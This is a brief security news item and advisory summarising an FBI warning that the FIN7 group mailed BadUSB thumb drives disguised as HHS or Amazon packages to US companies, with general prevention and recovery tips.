Date: Jan 7, 2022
The US Federal Bureau of Investigation says that FIN7, an infamous cybercrime group that is behind the Darkside and BlackMatter ransomware operations, has sent malicious USB devices to US companies over the past few months in the hopes of infecting their systems with malware and carrying out future attacks.
The FBI received reports, of packages containing these USB devices, being sent to US businesses in the transportation, insurance, and defense industries.
The packages were sent using the United States Postal Service and United Parcel Service.
There are two variations of packages—those imitating HHS [US Department of Health and Human Services are often accompanied by letters referencing COVID-19 guidelines, enclosed with a USB; and those imitating Amazon arrived in a decorative gift box containing a fraudulent thank you letter, counterfeit gift card, and a USB. In both cases, the packages contained LilyGO-branded USB devices.
that if recipients plugged the USB thumb drives into their computers, the devices would execute a BadUSB attack, where the USB drive would register itself as a keyboard instead and send a series of preconfigured automated keystrokes to the user’s PC.
These keystrokes would run PowerShell commands that downloaded and installed various malware strains that acted as backdoors for the attackers into the victims’ networks. The FBI, the agency said it has seen the group obtain administrative access and then move laterally to other local systems.
What to do?
Only open or download from established and trusted sources.
Never plug a foreign/unknown origin USB Drive into any computer system.
Be suspicious of unsolicited, random letters, packages or emails that you did not request.
Always confirm senders address and information before opening or downloading anything.
What can you do to when this happens to you?
If you find your network has been compromised, immediately shut down.
Identify the breach and type of virus or malware present.
Identify any data which might have been compromised or stolen and inform appropriate parties.
Rebuild the network from a known clean backup
Sources.
Catalin Cimpanu
FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware
